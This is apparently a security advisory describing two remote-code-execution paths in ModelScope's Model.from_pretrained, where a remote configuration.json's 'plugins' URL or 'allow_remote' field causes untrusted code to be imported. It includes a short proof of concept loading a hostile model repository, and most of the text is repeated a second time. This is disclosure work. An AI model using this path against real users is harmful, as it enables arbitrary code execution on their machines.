When users call Model.from_pretrained, the following two call chains may lead to Remote Code Execution (RCE):
Model.from_pretrained -> modelscope.utils.plugins.register_plugins_repo -> import_plugins -> import_module_and_submodules -> importlib.import_module
Model.from_pretrained -> (ex)modelscope.utils.plugins.register_modelhub_repo -> import_module_from_model_dir -> importlib.import_module
For the first call chain, when loading the model files, the code extracts the "plugins" field from the remote repository's configuration file configuration.json. If "plugins" is a URL, the package will be downloaded from that URL and imported via importlib.import_module. If the package contains malicious code, it will be executed.
For the second call chain, when loading the model files, the code extracts the "allow_remote" field from the remote repository's configuration.json instead of letting the user decide whether to trust remote code. This leads to importlib.import_module executing potentially malicious code.
poc
After setting up the environment, running the following code will output "hello" and "register_modelhub_repo has error xxx", indicating that the malicious code has been executed:
from modelscope.models import Model
from modelscope import HubApi
model_id = 'jiruwozhi/plugin_rce'
model = Model.from_pretrained(model_id, task='translation')
When users call Model.from_pretrained, the following two call chains may lead to Remote Code Execution (RCE):
For the first call chain, when loading the model files, the code extracts the "plugins" field from the remote repository's configuration file configuration.json. If "plugins" is a URL, the package will be downloaded from that URL and imported via importlib.import_module. If the package contains malicious code, it will be executed.
For the second call chain, when loading the model files, the code extracts the "allow_remote" field from the remote repository's configuration.json instead of letting the user decide whether to trust remote code. This leads to importlib.import_module executing potentially malicious code.
poc
After setting up the environment, running the following code will output "hello" and "register_modelhub_repo has error xxx", indicating that the malicious code has been executed: